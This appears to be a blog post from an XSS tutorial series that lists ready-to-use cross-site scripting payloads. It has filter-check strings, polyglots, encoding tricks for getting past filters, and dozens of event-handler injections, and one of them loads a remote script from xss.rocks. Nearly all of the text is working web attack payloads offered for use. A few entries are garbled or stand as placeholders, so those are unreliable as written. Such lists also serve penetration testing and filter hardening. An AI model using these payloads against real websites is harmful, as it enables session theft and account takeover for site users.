1. Cross Site Scripting (XSS) : Getting Started
2. Bypassing XSS Filters : Part 1
3. Bypassing XSS Filters : Part 2
Quick XSS Payloads
You can use these payloads when you want to quickly check for XSS in a webpge.
Filter Check
It will check which characters are being filter. It also checks if
tag is blocked or not.
/"'`\:;
XSS Tester: Alert XSS Statment
This payload will try to close tags and bypass basic filters to execute an alert box.
';">'>alert(String.fromCharCode(88,83,83))
XSS Polyglot 1
It is my custom payload which tries to bypass basic filters by closing tags and using different types of payloads.
';'>"><marquee>test</marquee><plaintext/onmouseover=prompt(test)> <img src="https://teamultimate.in/wp-content/uploads/2017/03/slide-main.png"> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
XSS Polyglot 2
//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--
XSS Polyglot 3
<svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d %0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg>
List Of Payloads
Without quotes and semicolons
Use when quotes and semicolons are being filtered.
<IMG SRC=javascript:alert('XSS')>
Without any quotes
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Defeats tag checking
<alert("test");//
Without closing tag
https://xss.rocks/xss.js?alert(1)
When script tag is being filtered
</script>alert(1)
Triple URL Encoding
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
JS-F**CK Payload
<img/src="x"/onerror="[boom]">
Using On wheel event with body tag
<body style="height:1000px" onwheel="[DATA]">
Using (
) and (&NewTab;) with <a> tag
<a href="j[785 bytes of (
	)]avascript:alert(1);">XSS</a>
Using OnDrag with Unicode Encoding
--><d/ /ondrag=co\u006efir\u006d(2)>hello.
Spaces and meta chars before the JavaScript in images for XSS
<IMG SRC="  javascript:alert('XSS');">
Here are some other payloads:
"><img src=x onerror=prompt(1)> "><svg/onload=prompt(1)> "><iframe/src=javascript:prompt(1)> "><h1 onclick=prompt(1)>Clickme</h1> "><a href=javascript:prompt(1)>Clickme</a> "><a href="javascript:confirm%28 1%29">Clickme</a> "><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a> "><textarea autofocus onfocus=prompt(1)> "><a/href=javascript:co\u006efir\u006d("1")>clickme</a> ">co\u006efir\u006d`1` ">co\u006efir\u006d`1` "><img src=x onerror=co\u006efir\u006d`1`> "><svg/onload=co\u006efir\u006d`1`> "><iframe/src=javascript:co\u006efir\u006d%28 1%29> "><h1 onclick=co\u006efir\u006d(1)>Clickme</h1> "><a href=javascript:prompt%28 1%29>Clickme</a> "><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a> "><textarea autofocus onfocus=co\u006efir\u006d(1)> "><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome "><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme "><img/src=x%0Aonerror=prompt`1`> "><iframe srcdoc="<img src=x:x onerror=alert(1)>"> "><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
The list ends here but I will add more payloads later.
Thanks for reading.